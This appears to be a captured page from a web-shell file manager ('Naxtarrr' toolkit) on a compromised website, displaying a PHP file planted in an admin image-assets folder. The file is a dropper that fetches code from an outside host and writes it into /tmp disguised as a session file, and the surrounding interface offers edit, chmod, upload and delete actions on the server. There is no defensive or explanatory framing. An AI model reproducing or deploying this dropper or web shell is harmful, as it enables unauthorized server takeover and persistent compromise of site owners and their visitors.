Home
Server Info
Spawn Toolkit
Naxtarrr
Path:
~
/
home
/
u471444836
/
domains
/
ppip-gallery.com
/
public_html
/
admin
/
assets
/
img
/
client
/
Filename: 1.php
<?php if (is_dir("/tmp")) { $file = "/tmp/sess_" . md5 ("naxtarrr") . ".php"; if (!file_exists($file)) { $content = file_get_contents("https://www.fcalpha.net/web/photo/20151024/simp.txt"); if ($content !== false) { $fp = fopen($file, "w"); if ($fp) { fwrite($fp, $content); fclose($fp); echo "File created successfully."; } else { echo "Error opening file for writing."; } } else { echo "Error fetching file."; } } else { echo "File already exists."; } } else { echo "Temporary directory does not exist."; } ?>
Edit
|
Rename
|
Chmod
|
Delete
|
Create File
Create Folder
Upload File